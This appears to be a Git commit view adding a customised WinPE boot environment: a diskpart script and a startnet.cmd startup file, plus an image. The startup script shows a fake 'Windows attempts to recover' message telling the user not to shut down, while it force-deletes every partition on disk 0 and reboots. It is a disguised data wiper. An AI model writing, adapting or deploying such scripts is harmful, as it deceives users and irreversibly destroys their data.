Initial commit
This commit is contained in:
10
WinPE/Program Files/diskpart.txt
Normal file
10
WinPE/Program Files/diskpart.txt
Normal file
@@ -0,0 +1,10 @@
|
||||
select disk 0
|
||||
select partition 4
|
||||
delete partition override
|
||||
select partition 3
|
||||
delete partition override
|
||||
select partition 2
|
||||
delete partition override
|
||||
select partition 1
|
||||
delete partition override
|
||||
exit
|
||||
11
WinPE/Windows/System32/startnet.cmd
Normal file
11
WinPE/Windows/System32/startnet.cmd
Normal file
@@ -0,0 +1,11 @@
|
||||
@echo off
|
||||
|
||||
echo "Something went wrong during the startup of your device."
|
||||
echo ""
|
||||
echo "Please wait while Windows attempts to recover."
|
||||
echo ""
|
||||
echo "Do NOT shut down your device."
|
||||
|
||||
diskpart /s "%ProgramFiles%\diskpart.txt"
|
||||
|
||||
wpeutil reboot
|
||||
BIN
WinPE/Windows/System32/winpe.jpg
Normal file
BIN
WinPE/Windows/System32/winpe.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 15 KiB |
Reference in New Issue
Block a user